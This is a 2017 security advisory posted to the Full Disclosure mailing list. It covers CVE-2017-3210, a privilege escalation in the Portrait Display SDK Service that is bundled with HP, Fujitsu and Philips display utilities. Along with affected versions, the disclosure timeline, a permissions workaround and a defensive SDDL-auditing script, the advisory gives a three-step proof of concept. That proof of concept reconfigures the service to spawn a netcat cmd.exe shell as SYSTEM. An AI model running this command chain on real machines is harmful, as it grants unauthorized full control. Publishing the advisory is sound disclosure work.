Message-ID: <58FF8DB5.7030907@sec-consult.com>
Date: Tue, 25 Apr 2017 19:56:05 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: <bugtraq@...urityfocus.com>, <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20170425-0 :: Portrait Display SDK Service Privilege Escalation

SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >
=======================================================================
              title: Privilege Escalation due to insecure service configuration
            product: Portrait Display SDK Service
 vulnerable version: multiple, see PoC
      fixed version: multiple, see solution
         CVE number: CVE-2017-3210
             impact: critical
           homepage: http://www.portrait.com/
              found: 2017-02-23
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"For nearly 20 years, Portrait Displays has provided customized software to
OEM monitor manufacturers across the globe. We develop tailored solutions,
encompassing the needs of today’s changing marketplace.

Our technologies allow OEMs to provide their end users with a premium
interactive experience. Our engineers work hand-in-hand with leading OEMS,
ODMs, and GPU and scaler companies, to develop and implement cutting-edge
software solutions."

Source: http://www.portrait.com/technology.html


Business recommendation:
------------------------
SEC Consult recommends not to use this service in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
The configuration of the Portrait Display SDK Service (PdiService.exe) was
found to be writable by every authenticated user in a default installation.
This allows an attacker to execute arbitrary code, elevate privileges and
obtain a shell with the privileges of the SYSTEM user.

The Portrait Display SDK Service is used in various OEM software packages that
ship by default on a wide range of notebooks. The software embedding the SDK
acts as a virtual OSD (On Screen Display) for "tuning" displays: setting gamma
values, changing color values, etc.

The vulnerability was identified in the software "DisplayView Click" from
Fujitsu. Because this SDK is used in several software packages, SEC Consult
tried to identify other potentially vulnerable packages rebranded by Portrait
Displays, Inc. The following list is an excerpt of packages containing the SDK,
some of which are installed by default on notebooks of HP, Philips, Fujitsu,
etc.


-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6
-) HP Display Assistant
-) HP Display Control
-) HP Mobile Display Assistant v1
-) HP Mobile Display Assistant v2
-) HP My Display
-) HP My Display All-In-One/TouchSmart
-) HP Picture in Picture
-) Philips SmartControl II
-) Philips SmartControl Lite
-) Philips SmartControl Premium


Portrait Displays Inc. confirmed that at least the packages listed under
"Vulnerable / tested versions" below are vulnerable.

Furthermore, a more detailed summary of this advisory has been published on our
blog:
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html

Proof of concept:
-----------------
To identify the permissions of the service, the built-in Windows command "sc"
(sc sdshow) was used. The output of the command for the vulnerable service can
be seen below:

  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
  (A;;CCLCSWRPWPDTLOCRRC;;;SY)
  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
  (A;;CCLCSWLOCRRC;;;IU)
  (A;;CCLCSWLOCRRC;;;SU)

By "converting" the Security Descriptor Definition Language (SDDL) string into
human-readable form, SEC Consult identified the following permissions for the
PdiService:

  RW NT AUTHORITY\Authenticated Users
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE

Because every authenticated user has write access on the service, an attacker
is able to execute arbitrary code by changing the service's binary path.
Moreover, Windows services are executed with SYSTEM permissions, resulting in
privilege escalation.

The workflow to execute arbitrary code is as follows:
1) Stop Service
   sc stop pdiservice
2) Alter service binary path
   sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e C:\WINDOWS\System32\cmd.exe"
3) Start Service
   sc start pdiservice


Vulnerable / tested versions:
-----------------------------
The following list contains all vulnerable versions:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id:  dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite  Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant  Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id:  dtune-hwp-R2013-10-11-1504-22
and above

HP My Display  Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id:  dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07


Vendor contact timeline:
------------------------
2017-03-01: Contacting vendor through email sales@...trait.com
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW
            vendors, assigned VU#219739
2017-03-01: The vendor responds and requests all attachments as plaintext in
            the email body because they are not allowed to open any attachments
            from "unknown parties".
            Therefore SEC Consult sends the PGP public keys as plaintext in the
            body of the email.
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer
2017-03-15: Informing CERT/CC about the status, asking for support to contact
            the vendor
2017-03-16: The vendor provides a public key for encrypted communication;
            the advisory is securely transmitted to the vendor.
2017-03-18: The vendor responds and confirms that they were able to reproduce
            the vulnerability. Detailed information on which brands are
            affected, as well as a timeline for an update, will be provided next
            week.
2017-03-28: Requesting update from Portrait Displays Inc. Asking about current
            state and a list of affected vendors.
2017-03-29: Vendor responds that they are still in the process of evaluating
            which 3rd parties are affected.
2017-04-06: Vendor updates us with information about the planned release
            schedule and affected vendors. Portrait is still in the process of
            evaluating which 3rd parties are affected. The list should be
            available at the end of the week. A patch that removes the invalid
            permission will be available on the vendor's website.
2017-04-17: Vendor provides us with a detailed list of affected products.
2017-04-18: Vendor publicly releases a patch for the vulnerability on their
            website (http://www.portrait.com/securityupdate.html)
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the
            disclosure of the CERT VU and the SEC Consult advisory.
2017-04-25: Public release.

Solution:
---------
A patch has been available since 18 April 2017.
See: http://www.portrait.com/securityupdate.html

Workaround:
-----------
To quickly get rid of the vulnerability, the permissions of the service should
be altered with the built-in Windows command "sc". To completely remove the
permissions of the "Authenticated Users" group, the following command can be
used (the SDDL string must be passed as a single argument on one line):

sc sdset pdiservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

This will result in the following set of permissions:
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE
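The SDDL-to-permissions translation that the proof-of-concept section performs by hand, together with a check that the `sc sdset` descriptor in this workaround really leaves no non-administrative trustee able to rewrite the service definition, as an added Python example. This is not code from the advisory or from Portrait Displays; it assumes the descriptor is pasted from `sc sdshow` output, uses the two SDDL strings quoted in this advisory as input, and takes the right and trustee abbreviation tables from Microsoft's SDDL documentation for services.

```python
"""Audit a Windows service DACL given as an SDDL string (added example).

The SDDL strings are the ones quoted in the advisory; everything else is
an assumption of this example, not part of the advisory or the product.
"""
import re

# Service-specific access rights as encoded in SDDL ACE rights strings.
RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",
    "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",
    "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE",
    "RC": "READ_CONTROL",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
}

# Well-known trustee abbreviations appearing in the advisory's descriptors.
TRUSTEES = {
    "AU": r"NT AUTHORITY\Authenticated Users",
    "SY": r"NT AUTHORITY\SYSTEM",
    "BA": r"BUILTIN\Administrators",
    "IU": r"NT AUTHORITY\INTERACTIVE",
    "SU": r"NT AUTHORITY\SERVICE",
}

# Rights the advisory counts as "write" (anything beyond querying the service).
WRITE_RIGHTS = {"DC", "RP", "WP", "DT", "SD", "WD", "WO"}
# Rights that let a trustee rewrite the service definition or its DACL,
# which is what turns a writable service into code execution as the service.
TAKEOVER_RIGHTS = {"DC", "WD", "WO"}
# Trustees expected to hold takeover rights on any service.
PRIVILEGED = {"SY", "BA"}

# ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*)\)")

# Copied from the advisory: vulnerable state and the state after sc sdset.
VULNERABLE_SDDL = ("D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                   "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
                   "(A;;CCLCSWLOCRRC;;;SU)")
FIXED_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")


def parse_dacl(sddl):
    """Return the DACL ACEs as (ace_type, [right tokens], trustee) tuples."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]  # drop a trailing SACL if one is present
    aces = []
    for ace_type, _flags, rights, _obj, _inh, trustee in ACE_RE.findall(dacl):
        if rights.startswith("0x"):
            raise ValueError("hex access masks are not handled here: " + rights)
        if len(rights) % 2:
            raise ValueError("malformed rights string: " + rights)
        tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        unknown = [t for t in tokens if t not in RIGHTS]
        if unknown:
            raise ValueError("unknown right(s) %s in %s" % (unknown, rights))
        aces.append((ace_type, tokens, trustee))
    return aces


def summarize(sddl):
    """Map each allow-ACE trustee to 'RW' or 'R', the way the advisory did."""
    summary = []
    for ace_type, tokens, trustee in parse_dacl(sddl):
        if ace_type != "A":  # deny and audit ACEs grant nothing
            continue
        level = "RW" if WRITE_RIGHTS & set(tokens) else "R"
        summary.append((level, TRUSTEES.get(trustee, trustee)))
    return summary


def takeover_trustees(sddl):
    """Non-privileged trustees allowed to change the service config or DACL."""
    return [TRUSTEES.get(trustee, trustee)
            for ace_type, tokens, trustee in parse_dacl(sddl)
            if ace_type == "A" and trustee not in PRIVILEGED
            and TAKEOVER_RIGHTS & set(tokens)]


if __name__ == "__main__":
    for label, sddl in (("vulnerable", VULNERABLE_SDDL), ("after sc sdset", FIXED_SDDL)):
        print(label)
        for level, name in summarize(sddl):
            print("  %s %s" % (level, name))
        print("  takeover-capable non-admin trustees:", takeover_trustees(sddl) or "none")
```

Run against the vulnerable descriptor the script reproduces the advisory's RW/R table and reports Authenticated Users as the only non-administrative trustee holding SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER; against the descriptor set by the workaround it reports none, which is the property worth checking on every service in an installed base rather than only on PdiService.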


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2017




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
